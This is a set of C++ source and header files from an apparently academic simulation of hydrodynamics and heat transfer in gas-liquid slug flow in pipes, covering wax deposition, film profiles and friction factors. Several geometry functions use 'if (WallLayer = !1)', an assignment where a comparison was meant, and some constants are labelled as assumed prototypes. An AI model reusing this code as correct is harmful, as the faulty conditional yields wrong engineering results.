TGActual[xx] = TS[xx];
Tb[xx] = TS[xx];
AvgTb = AvgTb + Tb[xx];
Kb[xx] = KS;
//For convective heat tranfser coefficient calcualtion
QSSum = QSSum + (EWS[xx])*dX / (dX*dt*M_PI*IDEf);
TSSum = TSSum + (-Tb[xx] + TwAv[xx])*dX;
hHotSave[xx] = QSSum / TSSum;
}
Update(Tw[xx][1][1], HLLS);
double help = MuL;
Update(Tb[xx], HLLS);
if (xx != 0)
{
SumhCheck = SumhCheck + (1 / IDEf)*KL*
SinglePhaseNu(RhoL, VSL, IDEf,
MuL, CpL, KL, xx*dX,
PipeRoughness, VSL /
(VSL + VSG));
}
}//End of axial loop
AvgTb = AvgTb / double(Nx);
NuNumCal = (QSSum + QFSum) / (TSSum + TfSum);
SumhCheck = SumhCheck / double(Nx);
}//End of constructor
void SlugFLowHeatTransferCal::
SetVariablesFromIputFiles(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign){
//Reading input vectors and assiging them into double variables
VSL = FilmInputs[0];
VSG = FilmInputs[1];
//T = SlugFLowHeatTransferCalInputs[2];
AvgTempForHydroUpdate= FilmInputs[3];
/* Please note that this temperature is used as a defualt
temperature value for themorpysical property calcualtion*/
P = FilmInputs[4];
PipeRoughness = FilmInputs[5];
IT = FilmInputs[6];//InterfactialTension
WaxThickness = WaxWidthVector;
WaxSolidFrac = WaxSolidFraction;
Tw = TwInitial;
TL = Tf;
TG = Tg;
TS = Ts;
HLTbLocation = FilmAssign;
SlugFlow = SlugAssign;
}
//In this method, heat transfer coefficient is calculated
double SlugFLowHeatTransferCal::HeatCoe(double K, double d, double Rho,
double V, double Mu, double Cp)
{
double ans;
ans = (0.023*K / d) * pow((Rho*V * d / Mu), 0.8) * pow((Cp*Mu / K), 1.0 / 3.0);
return(ans);
}
double SlugFLowHeatTransferCal::DistCoe(double Rho, double V, double d, double Mu)
{
double Re, co, c;
Re = Rho * V*d / Mu;
if (Re <= 2100) {
co = 2;
c = co - 1;
}
if (Re > 2100) {
co = 1.2;
c = co - 1;
}
return(c);
}
void SlugFLowHeatTransferCal::Update(double T,double HLLS)
{
user::FluidProperties Fluid(T-273.15, P);
RhoL = Fluid.Liquid.Rho(Fluid);
RhoG = Fluid.Gas.Rho(Fluid);
MuL = Fluid.Liquid.Mu(Fluid);
MuG = Fluid.Gas.Mu(Fluid);
KL = Fluid.Liquid.K(Fluid);
KG = Fluid.Gas.K(Fluid);
CpL = Fluid.Liquid.Cp(Fluid);
CpG = Fluid.Gas.Cp(Fluid);
//Slug properties
KS = HLLS * KL + (1 - HLLS)*KG;
RhoS = HLLS * RhoL + (1 - HLLS)*RhoG;
MuS = HLLS * MuL + (1 - HLLS)*MuG;
CpS = HLLS * CpL + (1 - HLLS)*CpG;
}
//Please note that the temperature in FilmInputs needs to be in in Centigrade
void SlugFLowHeatTransferCal::HydroUpdate(std::vector<double>&FimInputs,
std::vector<double>& HydroInputs)
{
double InitialGuess, dxx, Epsilon, hMax, EpsilonZh;
std::vector<double> xAxisOrg, HLTBOrg;
double Temp;
//HtdroInputs for final hydrodynamic properties of slug flow
InitialGuess = HydroInputs[0];
dxx = HydroInputs[1];
Epsilon = HydroInputs[2];
hMax = HydroInputs[3];
EpsilonZh = HydroInputs[4];
//Pipe specs
const user::PipeGeometry PipeProps;
PipeSpecs(PipeProps);
FilmProfile Film(FimInputs);
PressureCal Press(FimInputs, HydroInputs);
//These two variables are for VSL and VSG for X parameter
PressFilm = Press.PressSFilm;
PressGas = Press.PressSGas;
//Calculating the film profile
Film.HyrodynamicProperties(InitialGuess, dxx, Epsilon, hMax, EpsilonZh);
VTb = Film.VTb;
HLLS = Film.HLLS;//NP
VLLS = Film.VLLS;//NP
VGLS = Film.VGLS;//NP
VGTB = Film.VGTB;
VLTB = Film.VLTB;
Ls = Film.Ls;//NP
Vm = Film.Vm;//NP
Lf = Film.LfFinal;//NP
Lu = Lf + Ls;
//HLTBAvg = Film.HLTBAvg;
ro = OD / 2.0;
ri = IDPipe / 2.0;
w = ro - ri;
dX = Lu / double(Nx);
dt = dX / VTb;
NxS = round(Ls / dX);
NxF = round(Lf / dX);
//Film =sdf
for (int i = 0; i < Film.ZSize + 1; i++)
{
xAxisOrg.push_back(Film.XSave[i]);
HLTBOrg.push_back(Film.HLTBSave[i]);
}
for (int i = 0; i < NxF; i++) //check for Nx+1
{
xAxisNew.push_back(i*dX);
}
//In this section, the adjusted film profile is calculated
double x1, x2,y1,y2;
double m;
for (int i = 0; i < NxF; i++)
{
for (int j = 0; j < Film.ZSize + 1; j++)
{
if (xAxisNew[i] < Film.XSave[j])
{
x1 = Film.XSave[j-1];
x2 = Film.XSave[j];
y1 = Film.HLTBSave[j-1];
y2 = Film.HLTBSave[j];
m = (y2 - y1) / (x2 - x1);
HLTBOrgNew.push_back(y1 + m * (xAxisNew[i] - x1));
//std::cout << xAxisNew[i] << " " << HLTBOrgNew[i] << std::endl;
break;
}
}
}
double n,X_middle, Y_middle;
for (int i = 0; i < NxF-1; i++)
{
HLTBOrgNew[i] = (HLTBOrgNew[i + 1] + HLTBOrgNew[i])*0.5;
xAxisNew[i] = (xAxisNew[i] + xAxisNew[i + 1])*0.5;
}
}
double SlugFLowHeatTransferCal::SinglePhaseNu(double Rho, double v, double D,
double Mu, double Cp, double K,double dx,double E,double H)
{
double Nu1, f, Ref, Prf;
double RHS, Alpha, Phi2,m;
double X = pow((PressFilm / PressGas), 0.5);
double RHS2;
RHS2 = pow(H, -0.194)*(1 + 0.687*pow(X, -0.7));
m = 2;
Ref = Rho * v*D / Mu;
Prf = Mu * Cp / K;
f = 1.325 / pow(log(E / (3.7*IDEf) + 5.74 / (pow(Ref, 0.9))), 2);
Nu1 = (((f / 8.0)*(Ref - 1000)*Prf) / (1 + 12.7*pow(f / 8.0, 0.5)*
(pow(Prf, 2.0 / 3.0) - 1)))*(1 + pow(D / dx, 2.0 / 3.0));
Phi2 = 1 / (pow(H, m));
RHS = pow(H, 1.28)*Phi2;
return(Nu1*RHS2);
}
void SlugFLowHeatTransferCal::SurfaceAreaAGAL(double Theta, double Top,
double Side, double Bot)
{
if (thetahF <= M_PI * 0.5)
{
AL[1] = (ri- Bot) * thetahF*dX;
AG[1] = (ri- Bot) * (0.5*M_PI - thetahF)*dX;
AL[2] = 0;
AG[2] = (ri- Side) * 0.5*M_PI*dX;
AL[3] = 0;
AG[3] = (ri- Top) * 0.5*M_PI*dX;
AL[4] = 0;
AG[4] = (ri- Side) * 0.5*M_PI*dX;
}//thetahF <= M_PI * 0.5
if (thetahF > M_PI * 0.5 && thetahF <= 3.0*M_PI * 0.5)
{
AL[1] = 0.5*M_PI*(ri- Bot)*dX;
AG[1] = 0;
AL[2] = 0.5*(ri- Side)*(thetahF - 0.5*M_PI)*dX;
AG[2] = 0.5*(ri- Side)*(3.0*M_PI / 2.0 - thetahF)*dX;
AL[3] = 0;
AG[3] = (ri- Top) * 0.5*M_PI*dX;
AL[4] = 0.5*(ri- Side)*(thetahF - 0.5*M_PI)*dX;
AG[4] = 0.5*(ri- Side)*(3.0*M_PI / 2.0 - thetahF)*dX;
}//(thetahF > M_PI * 0.5 && thetahF <= 3.0*M_PI * 0.5)
if (thetahF > 3.0*M_PI * 0.5)
{
AL[1] = 0.5*M_PI*(ri- Bot)*dX;
AG[1] = 0;
AL[2] = 0.5*M_PI*(ri- Side)*dX;
AG[2] = 0;
AL[3] = (ri- Top) * (thetahF - 3.0*M_PI / 2.0)*dX;
AG[3] = (ri- Top) * (2 * M_PI - thetahF)*dX;
AL[4] = 0.5*M_PI*(ri- Side)*dX;
AG[4] = 0;
}//(thetahF > M_PI * 0.5 && thetahF <= 3.0*M_PI * 0.5)
}
void SlugFLowHeatTransferCal::UpdateFlowGeomParams
(const StratifiedFlowGeometry& FlowGeom,
double HL){
thetahF = FlowGeom.Theta;
AGP = FlowGeom.AGTilt*IDEf*IDEf;
ALP = FlowGeom.ALTilt*IDEf*IDEf;
SI = FlowGeom.SITilt*IDEf;
dL = FlowGeom.dL;
dG = FlowGeom.dG;
VLTB = VTb - (VTb - VLLS)*HLLS / HL;
VGTB = VTb - (VTb - VGLS)*(1 - HLLS) / (1 - HL);
VG = VGTB;
VL = VLTB;
Cg = DistCoe(RhoG, VGTB, dG, MuG);
Cs = DistCoe(RhoS, Vm, IDEf, MuS);
}
void SlugFLowHeatTransferCal::SlugFlowBooleanInitial()
{
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = false;
HLTbLocation[xx] = false;
if (xx <= (NxF - 1))
{
SlugFlow[xx] = false;
HLTbLocation[xx] = HLTBOrgNew[xx];
}
if (xx >(NxF - 1))
{
SlugFlow[xx] = true;
}
//s1 = HLTbLocation[xx]; s2 = SlugFlow[xx];
}
}
void SlugFLowHeatTransferCal::SlugFlowBooleanLater(std::vector<bool> SlugFlowPre,
std::vector<double> HLTbLocationPre){
/*
An example for SlugFlow[xx] boolean pre-adjustment
-----------------------------------SlugFlow[xx]--------------------------------------
0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1 1
1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1 1
1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 1
1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0 0
0 0 0 0 0 0 1 1 1 0 0 0 0 0 0 0 0 0 0 0 0 0
*/
std::vector<double> HLTbLocation2;
std::vector<bool> SlugFlow2;
SlugFlow2.resize(Nx+1);
HLTbLocation2.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
if (xx != 0)
{
SlugFlow2[xx] = SlugFlowPre[xx - 1];
HLTbLocation2[xx] = HLTbLocationPre[xx - 1];
}
else
{
SlugFlow2[xx] = SlugFlowPre[Nx - 1];
HLTbLocation2[xx] = HLTbLocationPre[Nx - 1];
}
}
for (int xx = 0; xx < Nx; xx++)
{
SlugFlow[xx] = SlugFlow2[xx];
HLTbLocation[xx] = HLTbLocation2[xx];
}
}
//In this method, the requried multi-dimensional vectors are resized as required
void SlugFLowHeatTransferCal::VectorResize()
{
hHotSave.clear();
Es.clear();
Er.clear();
Ex.clear();
ETheta.clear();
KDepoSave.clear();
riEff.clear();
EWf.clear();
EWG.clear();
EWS.clear();
ECF.clear();
ECG.clear();
ECS.clear();
Tb.clear();
Kb.clear();
TwAv.clear();
Qtot.clear();
hBulk.clear();
ApEff.clear();
EwfLocal.clear();
EwgLocal.clear();
EWsLocal.clear();
AL.clear();
AG.clear();
TLActual.clear();
TGActual.clear();
TLActual.resize(Nx + 1);
TGActual.resize(Nx + 1);
EWf.resize(Nx + 1);
EWS.resize(Nx + 1);
EWG.resize(Nx + 1);
ECF.resize(Nx + 1);
ECG.resize(Nx + 1);
ECS.resize(Nx + 1);
Tb.resize(Nx + 1);
Kb.resize(Nx + 1);
TwAv.resize(Nx + 1);
Qtot.resize(Nx + 1);
hBulk.resize(Nx + 1);
ApEff.resize(Nx + 1);
EwfLocal.resize(RingSec + 1);
EwgLocal.resize(RingSec + 1);
EWsLocal.resize(RingSec + 1);
AL.resize(RingSec + 1);
AG.resize(RingSec + 1);
hHotSave.resize(Nx + 1);
KDepoSave.resize(Nx + 1);
riEff.resize(Nx + 1);
Es.resize(Nx + 1);
Er.resize(Nx + 1);
Ex.resize(Nx + 1);
ETheta.resize(Nx + 1);
for (int xx = 0; xx < Nx; xx++)
{
KDepoSave[xx].resize(RingSec + 1);
riEff[xx].resize(RingSec + 1);
Es[xx].resize(WallLay + 1);
Er[xx].resize(WallLay + 1);
Ex[xx].resize(WallLay + 1);
ETheta[xx].resize(WallLay + 1);
for (int WL = 1; WL < WallLay + 1; WL++)
{
Es[xx][WL].resize(RingSec + 1);
Er[xx][WL].resize(RingSec + 1);
Ex[xx][WL].resize(RingSec + 1);
ETheta[xx][WL].resize(RingSec + 1);
}
}
}
void SlugFLowHeatTransferCal::PipeSpecs
(const user::PipeGeometry& PipeProps) {
IDPipe = PipeProps.IDPipe;
OD = PipeProps.ODPipe;
KPipe = PipeProps.KPipe;
CPPipe = PipeProps.CPPipe;
RhoPipe = PipeProps.RhoPipe;
}
double SlugFLowHeatTransferCal::Aout(int WallLayer)
{
double ans;
ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer))*w / 3.0)*dX;
return(ans);
}
double SlugFLowHeatTransferCal::Ain(int WallLayer, double WaxThickness) {
double ans;
if (WallLayer = !1)
{
ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer) + 1)*w / 3.0)*dX;
}
else {
ans = M_PI * 0.5*(ro - w - WaxThickness)*dX;
}
return(ans);
}
double SlugFLowHeatTransferCal::Ax(int WallLayer, double WaxThickness) {
double ans;
if (WallLayer = !1)
{
ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer))*
(w / 3.0) - w / (2 * 3.0))*w / 3.0;
}
else {
ans = M_PI * 0.5*(ro - w - WaxThickness / 2.0)*WaxThickness;
}
return(ans);
}
double SlugFLowHeatTransferCal::ATheta(int WallLayer, double WaxThickness) {
double ans;
if (WallLayer = !1)
{
ans = w / 3.0*dX;
}
else {
ans = WaxThickness * dX;
}
return(ans);
}
double SlugFLowHeatTransferCal::dxTheta(int WallLayer, double WaxThickness)
{
double ans;
if (WallLayer = !1)
{
ans = M_PI * 0.5*(ro - (WallLay - double(WallLayer))* (w / 3.0) - w / (2 * 3.0));
}
else {
ans = M_PI * 0.5*(ro - w - WaxThickness / 2.0);
}
return(ans);
}
double SlugFLowHeatTransferCal::WaxDepoK(double T,double Fw)
{
double Kdepo;
//This updates the thermal conductivity of the liquid phase
Update(T, HLLS);
Kdepo = KL * (1 + (3 * Fw) / ((KWax + 2 * KL) / (KWax - KL) - Fw));
return(Kdepo);
}
double SlugFLowHeatTransferCal::IDEff(std::vector<std::vector<double>>& WaxVector)
{
double ans;
double sum=0;
double sum2=0;
double AvgThickness;
for (int j = 0; j < Nx; j++)
{
sum = 0;
for (int i = 1; i < RingSec +1; i++)
{
sum = sum + WaxVector[j][i];
}
sum2 = sum2 + sum / 4.0;
}
AvgThickness = sum2 / double(Nx);
ans = IDPipe - 2 * AvgThickness;
return(ans);
}
}
<file_sep>#ifndef OverlHeatTransfer_H
#define OverlHeatTransfer_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "SlugFlowHeatTransfer.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
//In this class, we will try to calucalte the temperature distribution in counter-current flow
class SlugFlowOveralHeatTranfer {
public:
//In this method, the correct average temperature for hydrodynamic property update will be calculated
double AvgTempForHydroUpdate(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector, std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs, std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf, std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign, std::vector<double>& q, double TInlet, double EpsLimit);
};
} //end of MultiphaseTemperature namespace
#endif<file_sep>#ifndef SlugFlowHeatTransfer_H
#define SlugFlowHeatTransfer_H
#include <cmath>
#include <iostream>
#include <fstream>
#include <vector>
#include "CaseSpecificInputs.h"
#include "StratifiedFlowGeometry.h"
#include "SlugFlowFilmProfile.h"
#include "dPCalculation.h"
#include "OveralHeatTransfer.h"
namespace MultiphaseTemperature {
//For those flow conditions where Lu is large, bigger Nx can help the accuracy
class SlugFLowHeatTransferCal {
public:
//static const int NXSize = 50;
double NuNumCal;
//double NuNumCheck;
void SlugFlowHeatModel(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<double>& HydroInputs,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign,
std::vector<double>& q, double TInlet);
//static const int NTime = 1000;
static const int Nx = 50;
static const int WallLay = 4;
static const int RingSec = 4;
//Pipe's inlet temperature
//In the case, the Inlet temperature is assumed to he same as the initial condition
//Number of sections in slug and in film sections
double UInt;
double AvgTb=0;
double AvgTempForHydroUpdate;
double NxS, NxF;
double g = 9.8;
double RhoL, RhoG, MuL, MuG, KG,
KL, CpL, CpG, IT, KS, RhoS, MuS, CpS;
double VSG, VSL, VTb, VLLS, VLTB,
VGTB, VLTB2, VGTB2, VGLS
, VL, VG, VL2, VG2, Vm;
double T, AvgTemp,P;
double Cg, Cs;
double Ls, Lf, Lu;
double ECF1, ECF2, ECG1, ECG2, ECS1, ECS2;
double dL, dG, SI, AGP, ALP;
double HLTBAvg, hFAvg,HLTB2,HLLS;
double thetahF;
double w, KPipe,KThermal, CPPipe, RhoPipe,
PipeRoughness, CpPipe, IDPipe,IDEf, OD, ro, ri;
double dX, dt;
double PressGas, PressFilm;
double KGSave, KLSave;
double sumWF = 0, sumWG = 0, sumWS = 0,
QSSum = 0, QFSum = 0, QGSum = 0,
SumhCheck = 0, TSSum = 0, TfSum = 0;
double WLayD = double(WallLay);
double hFilmGas, hSlug, hFilmLiquid;
bool Flag = 1;
double RhoDepo = 855; //Assumed
double KWax=0.25;//Assumed
std::vector<double> EWf, EWG, EWS, ECF, ECG,ECS, Tb, Kb, TwAv, Qtot, hBulk,
EwfLocal, EwgLocal, EWsLocal,AL, AG,ApEff;
double check;
double RhoJacket = 1080; //should be checked, it is just a prototype
double QCoolant=0.004600455; //This should be input, it is just a protoype
double WcJacket;
std::vector<double> q;
std::vector<double> TS;
std::vector<double> TL,TLActual;
std::vector<double> TG, TGActual;
std::vector<std::vector<double>> WaxThickness, WaxSolidFrac;
std::vector<double> xAxisNew, HLTBOrgNew;
std::vector<std::vector<std::vector<double>>>Es, Er, Ex, ETheta;
std::vector<std::vector<std::vector<double>>>Tw;
std::vector<std::vector<double>>KDepoSave;
std::vector<double> hHotSave;
std::vector<std::vector<double>>riEff;
std::vector<double> HLTbLocation;
std::vector<bool> SlugFlow;
//std::ofstream TLOut, TGOut, TW1Out, TW2Out, TW3Out, NuCal, NuCheck,
// TW4Out, TW5Out, TW6Out, TW7Out, TW8Out,TWax1, TWax2, TWax3,
// TW9Out, Time, Axial, Tbulk;
/*Input variables are read from the input vectors and are stored to
appropriate class parameters*/
void SetVariablesFromIputFiles(std::vector<double>& FilmInputs,
std::vector<std::vector<double>>& WaxWidthVector,
std::vector<std::vector<double>>& WaxSolidFraction,
std::vector<std::vector<std::vector<double>>>& TwInitial,
std::vector<double>& Ts, std::vector<double>& Tf,
std::vector<double>& Tg, std::vector<double>& FilmAssign,
std::vector<bool>& SlugAssign);
//Hydrodynamic properties are calculated and assigned to class variables
void HydroUpdate(std::vector<double>&FimInputs,std::vector<double>& HydroInputs);
/*Convective heat transfer coefficient is calculated. hL,
hG and hS are calculated in the program*/
double HeatCoe(double K, double d, double Rho, double V, double Mu, double Cp);
/*Distribution coefficient is calcualted. This parameter is different for
laminar and for turbulent flow */
double DistCoe(double Rho, double V, double d, double Mu);
/*In this method, fluid properties are updated for a given Temperature
and slug holdup*/
void Update(double T, double HLLS);
/* Nusselt number for liquid single phase flow is calculated for Two-Phase
Nusselt number coefficient correlation */
double SinglePhaseNu(double Rho, double v, double D, double Mu,
double Cp, double K, double dx, double E, double H);
//AG and AL for Er calculation and EwLocal calcualtions
void SurfaceAreaAGAL(double Theta, double Top, double Side, double Bot);
//Stratified flow geormetries plus some other related values are calculated
void UpdateFlowGeomParams(const StratifiedFlowGeometry& FlowGeom, double HL);
/*The slugFlow boolean is set appropriately for each time step from the
following two methods*/
void SlugFlowBooleanInitial();
void SlugFlowBooleanLater(std::vector<bool> SlugFlowPre,
std::vector<double> HLTbLocationPre);
//Corrct sizes are assigned to the vectors
void VectorResize();
//The pipe's specifications are obtained through this method
void PipeSpecs(const user::PipeGeometry& PipeProps);
//Aout in the calcualtions
//Ax, ArInn, ArOut, ATheta are calculated in this method
double Aout(int WallLayer);
double Ain(int WallLayer, double WaxThickness);
double Ax(int WallLayer, double WaxThickness);
double ATheta(int WallLayer, double WaxThickness);
double dxTheta(int WallLayer, double WaxThickness);
double WaxDepoK(double T, double Fw);
double IDEff(std::vector<std::vector<double>>& WaxVector);
};
}//namespace MultiphaseTemperature
#endif<file_sep># C-simulation-for-hydrodynamic-and-heat-transfer-calculations-in-Slug-flow-condition
Thorough this simulation, a transient hydrodynamic-heat transfer model for gas-liquid slug flow in pipe has been developed. Please go to Report.pdf for a complete manual.
<file_sep>#ifndef dPCalculation_H
#define dPCalculation_H
#include <iostream>
#include <cmath>
#include <vector>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include "StratifiedFlowGeometry.h"
namespace MultiphaseTemperature {
class PressureCal {
public:
PressureCal(std::vector<double>& Inputs, std::vector<double>& HydroInputs);
double dP;
double ShearS, PressSlug /*Pressure contribtion from slug*/, fS /*friction factor*/;
double ShearF, ShearSF, PressSFilm, PressFilm, fF,fSF;
double ShearG,ShearSG, PressSGas, PressGas, fG, fSG;
private:
double VSL, VSG, ID, T, P, PipeRoughness, IT;
double Vm;
double RhoG, RhoL, MuL, MuG, RhoS, MuS;
double HLLS, Lf, Ls,HLTBAvg;
double AF, AG, SG, SF, SI;
double VF, VG, VTb, VLLS, VGLS, VGTB,VLTB;
double LfInitial, dx, Epsilon, hMax, EpsilonZh;
//Tells the number of points in RK45 discritization
int ZSize;
std::vector<double> zArray, HLTBArray;
//There is one shear associated with the slug body section
};
}//End of MultiphaseTemperature namespace
#endif
<file_sep>//In this source file, slug flow hydrodynamic properties are calculated
//with full film profile calculation. In this source file, mainly Taitel and Barnea
//model is developed.
//In this source file, all units are in SI units
#include <iostream>
#include <chrono>
#include <cmath>
#include "CaseSpecificInputs.h"
#include "SlugFlowFilmProfile.h"
#include <fstream>
namespace MultiphaseTemperature {
//Final results for Film profile is calculated in "HyrodynamicProperties" method
FilmProfile::FilmProfile(std::vector<double>& FilmProfileInputs) {
//???????????????
Flag2 = 0;
g = 9.8;
VSL = FilmProfileInputs[0];
VSG = FilmProfileInputs[1];
ID = FilmProfileInputs[2];
T = FilmProfileInputs[3];
P = FilmProfileInputs[4];
PipeRoughness = FilmProfileInputs[5];
IT = FilmProfileInputs[6];//InterfactialTension
//Mixture velocity
Vm = VSL + VSG;
//Distribution variable
C0 = 1.2;
user::PipeGeometry PipeProps;
OD = PipeProps.ODPipe;
user::FluidProperties Fluid(T, P);
//This value is slightly overestimated in compare with what Ake
//reported in EXCEL file. The answer will be noticably different
//if the values from Ake EXCEL file is used
RhoG = Fluid.Gas.Rho(Fluid); // or RhoG = Fluid.Gas.Rho2(Fluid) (for P=350Psi)
//From fitting correlations
RhoL = Fluid.Liquid.Rho(Fluid);
MuL = Fluid.Liquid.Mu(Fluid);
MuG = Fluid.Gas.Mu(Fluid);
// Gregory - suggested by Zheng 2003 for intial gueess
HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
/*********Some other HLLS relations***********/
//HLLS = exp(-(2.48*pow(10, -6)*ReLS));
/*HLLS = 1 - 0.058*(2 * pow(0.4*IT /
((RhoL - RhoG)*9.8), 0.5)*pow(RhoL /
IT, 0.6)*pow(2.0/ID* 0.007*pow(VSG+VSL,3), 0.4) - 0.725, 2); */
//Mixture properties
RhoS = RhoL * HLLS + RhoG * (1 - HLLS);
MuS = MuL * HLLS + MuG * (1 - HLLS);
//From (Pan, 2010), the average slug length
//for oil/Air experiments was reported to be 24D for Mu = 4 Cp
Ls = 30 * ID;
//Translational velocity
VTb = C0 * (VSL + VSG) + 0.54*pow(g*ID, 0.5);
//Velocity of gas and liquid phase in slug section
VGLS = C0 * (VSL + VSG);
VLLS = ((VSL + VSG) - VGLS * (1 - HLLS)) / HLLS;
Flag2 = 0;
}
//Fanning friction factor (main relation-implicit)
double FilmProfile::FannningFrictionFactor(double Rho, double V,
double ID, double Mu,
double Roughness) {
double Eps = 10, FPlusdx, FPrime;
double F, Re;
double ans = 0.0001;
double dx = 1E-10;
while (Eps > 1E-15)
{
Re = Rho * V*ID / Mu;
F = 1 / pow(ans, 0.5) + 4 * log10(((Roughness / ID) / (3.7)) + (1.256 / (Re*pow(ans, 0.5))));
FPlusdx = 1 / pow((ans + dx), 0.5) + 4 * log10(((Roughness / ID) / (3.7)) + (1.256 / (Re*pow((ans + dx), 0.5))));
FPrime = ((FPlusdx)-(F)) / dx;
ans = ans - F / FPrime;
Eps = F;
}
return(ans);
}
//ODE of dhF/dz is calculated in this method
double FilmProfile::hFdZ(double hF) {
//Stratified Geometric parameters
double SG, SF, SI;
double AF, AG;
//Shear terms from liqiud and gas to wall and from gas to liquid interface
double fF, fG, fI;
double ShearF, ShearG, ShearI;
double checking;
//Relative velocities to VTb
double VF, VG;
//other variables
double hLTilt = hF / ID;//This is not liquid phase holdup
double HL; //This is liquid holdup
double A;
double dHLTBdhF;// dHLTB/dhF
double ans;
// H should be liquid holdup!
//At this point, we need to calculate the liquid holdup
//Becase we need liquid holdup (not liquid height) for stratified geometry class
hLTilt = hF / ID;
//Now we can calculate the liquid phase holdup
HL = (1 / Pi)*(Pi - acos(2 * hF / ID - 1) + (2 * hF / ID - 1)*
pow(1 - pow(2 * hF / ID - 1, 2), 0.5));
//Parameters of stratified flow gemoetry are calculated for the given lqidui holdup
StratifiedFlowGeometry Geometry(HL,ID);
AF = Geometry.ALTilt*ID*ID;
AG = Geometry.AGTilt*ID*ID;
SG = Geometry.SGTilt*ID;
SF = Geometry.SLTilt*ID;
SI = Geometry.SITilt*ID;
//Relative velocities (referneced to VTb)
VF = (VTb - VLLS)*HLLS / HL;
VG = (VTb - VGLS)*(1 - HLLS) / (1 - HL);
//Actual velocities of film and gas core in stratified region
VLTB = VTb - VF;
VGTB = VTb - VG;
dHLTBdhF = (4.0 / (Pi*ID))*pow(1 - pow(2 * hF / ID - 1, 2), 0.5);
//Friction factors
fF = FannningFrictionFactor(RhoL, abs(VLTB), 4 * AF / SF, MuL, PipeRoughness);
fG = FannningFrictionFactor(RhoG, abs(VGTB), 4 * AG / (SI + SG),
MuG, PipeRoughness);
//shear terms
ShearF = fF * RhoL*abs(VLTB)*VLTB / 2.0;
ShearG = fG * RhoG*abs(VGTB)*VGTB / 2.0;
ShearI = fG * RhoG*abs(VGTB - VLTB)*(VGTB - VLTB) / 2.0;
//If interface shear is neglected, it affects the the results massively
ans = ((ShearF*SF / AF) - (ShearG*SG / AG) - (ShearI*SI*(1 / AF + 1 / AG)))
/ ((RhoL - RhoG)*g - (RhoL*VF*(VTb - VLLS)*HLLS*dHLTBdhF / HL / HL)
- (RhoG*VG*(VTb - VGLS)*(1 - HLLS)*dHLTBdhF / (1 - HL) / (1 - HL)));
return(ans);
}
double FilmProfile::hFCritical(double hF)
{
//Stratified Geometric parameters
double SG, SF, SI;
double AF, AG;
//Relative velocities to VTb
double VF, VG;
//other variables
double hLTilt = hF / ID;//This is not liquid phase holdup
double HL; //This is liquid holdup
double dHLTBdhF;// dHLTB/dhF
hLTilt = hF / ID;
//Now we can calculate the liquid phase holdup
HL = (1 / Pi)*(Pi - acos(2 * hF / ID - 1) + (2 * hF / ID - 1)*
pow(1 - pow(2 * hF / ID - 1, 2), 0.5));
StratifiedFlowGeometry Geometry(HL,ID);
AF = Geometry.ALTilt*ID*ID;
AG = Geometry.AGTilt*ID*ID;
SG = Geometry.SGTilt*ID;
SF = Geometry.SLTilt*ID;
SI = Geometry.SITilt*ID;
//Relative velocities (referneced to VTb)
VF = (VTb - VLLS)*HLLS / HL;
VG = (VTb - VGLS)*(1 - HLLS) / (1 - HL);
//Actual velocities of film and gas core in stratified region
VLTB = VTb - VF;
VGTB = VTb - VG;
dHLTBdhF = (4.0 / (Pi*ID))*pow(1 - pow(2 * hF / ID - 1, 2), 0.5);
return(((RhoL - RhoG)*g - (RhoL*VF*(VTb - VLLS)*HLLS*dHLTBdhF / HL / HL)
- (RhoG*VG*(VTb - VGLS)*(1 - HLLS)*dHLTBdhF / (1 - HL) / (1 - HL))));
}
double FilmProfile::hFCriticalDetermination()
{
double HL;
double dx = 0.00001;
double x, FPrime = 0;
double Error = 10;
HLLS = 1 / (1 + pow(Vm / 8.66, 1.39));
StratifiedFlowGeometry Geometry(HLLS,ID);
x= Geometry.hLTilt *ID*0.81;
while (Error > 0.00001)
{
FPrime = (hFCritical(x +dx) - hFCritical(x)) / dx;
x = x - hFCritical(x) / FPrime;
Error = abs(hFCritical(x));
}
//err = hFCritical(x, hMax, EpsilonZh);
HL=(1 / Pi)*(Pi - acos(2 * x / ID - 1) + (2 * x / ID - 1)*
pow(1 - pow(2 * x / ID - 1, 2), 0.5));
return(x);
}
//In this method, the the film profile is calculated and
//mass balanced is checked from a given film length
